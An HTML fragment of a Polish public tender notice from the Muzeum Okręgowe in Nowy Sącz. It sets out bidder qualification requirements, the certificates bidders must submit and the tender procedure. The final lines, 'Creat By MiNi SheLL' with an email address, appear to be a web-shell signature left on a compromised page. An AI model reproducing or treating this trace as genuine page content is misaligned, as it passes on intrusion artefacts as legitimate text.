</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1)	Którzy dysponują oraz dysponują lub mogą dysponować osobami posiadającymi uprawnienia do kierowania budową lub robotami budowlanym  w następujących specjalnościach:  
a)	konstrukcyjno - budowlanej 
b)	instalacyjnej w zakresie sieci, instalacji i urządzeń: cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych;
c)	drogowej
d)	instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych
e)	 dysponują uprawnionym geodetą w zakresie: geodezyjne pomiary sytuacyjno wysokościowe realizacyjne i inwentaryzacyjne</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>informacja banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy na kwotę nie mniejszą niż 1 000 000 zł.,</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">oświadczenie na temat wielkości średniego rocznego zatrudnienia u wykonawcy usług lub robót budowlanych oraz liczebności personelu kierowniczego w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a w przypadku gdy okres prowadzenia działalności jest krótszy - w tym okresie</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>nie dotyczy</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.muzeum.sacz.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Muzeum Okręgowe
ul.Lwowska 3
33-300 Nowy Sącz.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 21.09.2010 godzina 09:00, miejsce: Muzeum Okręgowe
ul.Lwowska 3
33-300 Nowy Sącz.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com